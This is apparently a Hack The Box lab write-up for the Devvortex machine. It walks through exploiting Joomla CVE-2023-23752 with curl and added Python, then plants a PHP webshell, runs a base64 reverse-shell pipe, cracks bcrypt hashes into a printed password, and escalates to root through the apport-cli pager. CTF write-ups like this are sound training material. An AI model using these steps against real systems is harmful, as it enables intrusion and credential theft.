Writeup: HtB – Devvortex
Intro
Devvortex is a retired, easy-rated box on Hack The Box. It features exploitation of a content management system, hash cracking, and abuse of a sudo-permitted application to escalate privileges on a Linux machine.
Walkthrough
Enumeration
Let's start with an nmap scan.
22 open ssh
80 open http
Accessing the web server on port 80 redirects us to devvortex.htb, so let's add that name to /etc/hosts. The site itself doesn't look too interesting; maybe other virtual hosts are served here.
Using ffuf to enumerate other sites:
ffuf -u http://devvortex.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H 'Host: FUZZ.devvortex.htb' --fw 4
We get a hit on dev.devvortex.htb, so let's add that to our hosts file.
Before starting any sort of manual enumeration, let's fuzz for some interesting endpoints:
ffuf -u http://dev.devvortex.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt --fs 162
We get a hit on /administrator. Navigating to that endpoint shows that Joomla is used as the CMS. One way to enumerate the Joomla version is the joomla.xml manifest, which is usually found at administrator/manifests/files/joomla.xml.
Accessing this file shows that Joomla version 4.2.6 is running.
A quick search shows that this version is vulnerable to CVE-2023-23752, an improper access check in Joomla's web services API (affecting 4.0.0 through 4.2.7) that exposes configuration data to unauthenticated requests, and for which public exploits exist.
Exploiting a vulnerable Joomla version
Let's have a quick look at the exploit:
[...]
# CVE-2023-23752: both endpoints answer without authentication once ?public=true is set
def fetch_users(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/users?public=true"
  http.get(vuln_url)
end
[...]
def fetch_config(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true"
  http.get(vuln_url)
end
[...]
The exploit simply requests two API endpoints with public=true and no authentication, so we can do the same with curl.
curl -s http://dev.devvortex.htb/api/index.php/v1/users?public=true | jq
[...]
  "data": [
    {
      "type": "users",
      "id": "649",
      "attributes": {
        "id": 649,
        "name": "lewis",
        "username": "lewis",
        "email": "lewis@devvortex.htb",
        "block": 0,
        "sendEmail": 1,
        "registerDate": "2023-09-25 16:44:24",
        "lastvisitDate": "2023-10-29 16:18:50",
        "lastResetTime": null,
        "resetCount": 0,
        "group_count": 1,
        "group_names": "Super Users"
      }
    },
[...]
curl -s http://dev.devvortex.htb/api/index.php/v1/config/application?public=true | jq
[...]
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "user": "lewis",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "password": "P4ntherg0t1n5r3c0n##",
        "id": 224
      }
[...]
Only the interesting parts are shown. The config endpoint leaks the database credentials, and since lewis reuses that password for the Joomla Super User account, we are able to log in to /administrator as lewis.
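Joomla returns the configuration as a list of objects that all share one record id but carry a single attribute each, so the values have to be folded back together before they are useful. The following Python is an added example (not part of the original writeup and not taken from the exploit above) that does that folding and picks out the Super User accounts; the sample responses are constructed from the output above, and the "editor" user plus the host and dbprefix entries are placeholders rather than data from the box.

```python
import json
import urllib.request
from typing import Dict, List, Optional

# Constructed sample responses in the shape returned by the vulnerable API.
# The lewis entry mirrors the output above; the "editor" user and the
# host/dbprefix entries are placeholders, not data from the box.
USERS_RESPONSE = {
    "data": [
        {"type": "users", "id": "649", "attributes": {
            "id": 649, "name": "lewis", "username": "lewis",
            "email": "lewis@devvortex.htb", "block": 0,
            "group_count": 1, "group_names": "Super Users"}},
        {"type": "users", "id": "650", "attributes": {
            "id": 650, "name": "editor", "username": "editor",
            "email": "editor@devvortex.htb", "block": 1,
            "group_count": 1, "group_names": "Editor"}},
    ]
}
CONFIG_RESPONSE = {
    "data": [
        {"type": "application", "id": "224", "attributes": {"host": "localhost", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"user": "lewis", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"password": "P4ntherg0t1n5r3c0n##", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"dbprefix": "sd4fg_", "id": 224}},
    ]
}


def fetch_json(root_url: str, path: str, timeout: int = 10) -> dict:
    """GET one of the leaking endpoints, e.g. /api/index.php/v1/users?public=true."""
    with urllib.request.urlopen(root_url.rstrip("/") + path, timeout=timeout) as resp:
        return json.load(resp)


def merge_config(resp: dict) -> Dict[int, Dict[str, object]]:
    """Fold the one-attribute-per-object config list into one dict per record id."""
    merged: Dict[int, Dict[str, object]] = {}
    for item in resp.get("data", []):
        if item.get("type") != "application":
            continue
        attrs = dict(item.get("attributes", {}))
        rec_id = int(attrs.pop("id", item.get("id")))
        merged.setdefault(rec_id, {}).update(attrs)
    return merged


def db_credentials(config_resp: dict) -> Optional[Dict[str, str]]:
    """Return the DB user/password (and table prefix, if present) from the config leak."""
    for cfg in merge_config(config_resp).values():
        if "user" in cfg and "password" in cfg:
            return {"user": str(cfg["user"]), "password": str(cfg["password"]),
                    "prefix": str(cfg.get("dbprefix", ""))}
    return None


def privileged_users(users_resp: dict) -> List[str]:
    """Usernames of unblocked accounts in the Super Users group: the login targets."""
    hits = []
    for user in users_resp.get("data", []):
        attrs = user.get("attributes", {})
        groups = attrs.get("group_names") or ""
        if user.get("type") == "users" and attrs.get("block") == 0 and "Super Users" in groups:
            hits.append(attrs["username"])
    return hits


if __name__ == "__main__":
    # Offline demo on the constructed samples; swap in fetch_json(...) against a target.
    print("super users:", privileged_users(USERS_RESPONSE))
    print("db creds   :", db_credentials(CONFIG_RESPONSE))
```

Against a live target, replace the constants with fetch_json("http://dev.devvortex.htb", "/api/index.php/v1/config/application?public=true") and the users path; the merge step is what turns the scattered attributes into a usable user/password pair.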
Gaining RCE on the box
As a Super User we can edit template files through the template editor in the administrator backend. I decided to add a webshell to the Cassiopeia template's error.php and then use it to gain a reverse shell.
Webshell:
<?php echo Text::_(system($_GET['cmd'])); ?>
Accessing the webshell: http://dev.devvortex.htb/media/templates/site/cassiopeia/js/main.js?cmd=$COMMAND
Requesting a path that does not exist makes Joomla render the template's error.php, so the shell runs inside the normal Joomla bootstrap (which is also why the Text class is available) and the cmd parameter reaches system().
Reverse Shell
echo "$base64_encoded_reverse_shell" | base64 -d | bash
Host Enumeration
We can already assume that some sort of database is running, but let's confirm this by running netstat -tulnp. It shows MySQL listening on its default port 3306. We can connect to it with lewis' database credentials from the config leak and then dump the Joomla users table.
Dumping Credentials and cracking hashes
mysql> select * from sd4fg_users;
(output trimmed to username:password hash)
lewis:$2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u
logan:$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12
Let's check if a user named logan exists on this box with grep logan /etc/passwd. Logan is a user on this machine, so his hash is the one worth cracking first.
I decided to use john to crack Logan's hash.
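Before spending CPU time on bcrypt, it helps to sanity-check the dumped hashes and decide the order in which to crack them. The following Python is an added example (not part of the original writeup) that validates the bcrypt format, derives the work factor john will report, and puts users with a local login shell first; the two hashes are the ones printed above, while the /etc/passwd lines (uids and shells) are constructed placeholders.

```python
import re
from typing import List, Tuple

# bcrypt: $2a/$2b/$2y, a two-digit cost, then 22-char salt + 31-char hash (53 chars)
BCRYPT_RE = re.compile(r"^\$2[aby]\$(\d{2})\$[./A-Za-z0-9]{53}$")
NO_LOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin"}

# Constructed inputs: the two hashes as printed above, plus a placeholder
# /etc/passwd (uids and shells are assumptions, not copied from the box).
DUMP = """lewis:$2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u
logan:$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12"""
PASSWD = """root:x:0:0:root:/root:/bin/bash
logan:x:1000:1000:,,,:/home/logan:/bin/bash
mysql:x:113:117:MySQL Server,,,:/nonexistent:/bin/false"""


def parse_dump(text: str) -> List[Tuple[str, str]]:
    """Parse user:hash lines, skipping anything that is not a well-formed bcrypt hash."""
    pairs = []
    for line in text.splitlines():
        if ":" not in line:
            continue
        user, h = line.strip().split(":", 1)
        if BCRYPT_RE.match(h):
            pairs.append((user, h))
    return pairs


def bcrypt_cost(h: str) -> int:
    """The $NN$ field is the log2 work factor."""
    m = BCRYPT_RE.match(h)
    if not m:
        raise ValueError("not a bcrypt hash")
    return int(m.group(1))


def john_iterations(h: str) -> int:
    """john prints 'Cost 1 (iteration count)' as 2**cost, so $10$ shows up as 1024."""
    return 2 ** bcrypt_cost(h)


def local_shell_users(passwd_text: str) -> List[str]:
    """Accounts in /etc/passwd that can actually log in (shell is not a nologin shell)."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[6] not in NO_LOGIN_SHELLS:
            users.append(fields[0])
    return users


def prioritize(dump_text: str, passwd_text: str) -> List[Tuple[str, str]]:
    """Order the hashes so that CMS users who also have a local shell come first."""
    local = set(local_shell_users(passwd_text))
    return sorted(parse_dump(dump_text), key=lambda pair: pair[0] not in local)


def write_john_file(pairs: List[Tuple[str, str]], path: str = "hash") -> None:
    """user:hash lines, the input format john reads so it can label the cracked password."""
    with open(path, "w") as fh:
        for user, h in pairs:
            fh.write(f"{user}:{h}\n")


if __name__ == "__main__":
    ordered = prioritize(DUMP, PASSWD)
    for user, h in ordered:
        print(f"{user}: cost {bcrypt_cost(h)} ({john_iterations(h)} iterations)")
    write_john_file(ordered)
```

The 1024 iterations this derives for cost 10 is exactly the "Cost 1 (iteration count) is 1024" that john prints in the run below, which is a quick way to confirm john parsed the hash as you expected.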
john --format=bcrypt hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tequieromucho (?)
1g 0:00:00:05 DONE (2024-04-13 16:24) 0.1992g/s 279.6p/s 279.6c/s 279.6C/s lacoste..harry
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
This gives us logan:tequieromucho.
User Enumeration
Running sudo -l shows that logan is allowed to run /usr/bin/apport-cli as root via sudo. A quick search on how to abuse this turns up CVE-2023-1326: when apport-cli is used to view a crash report in a terminal, it hands the report to a pager (less), and a pager running with root privileges lets us spawn a shell from its ! command.
To make sure apport has a valid report to open, I first generated a crash report for a running process and then viewed it:
sudo /usr/bin/apport-cli -f --pid 17932 --save /var/crash/ex.crash &&
sudo /usr/bin/apport-cli -c /var/crash/ex.crash
Choosing V (view report) opens the file in less; typing the following at the pager prompt spawns a shell:
!/bin/bash
Since this relies on an interactive pager, it only works from a proper TTY, so a plain reverse shell has to be upgraded first.
We are now root.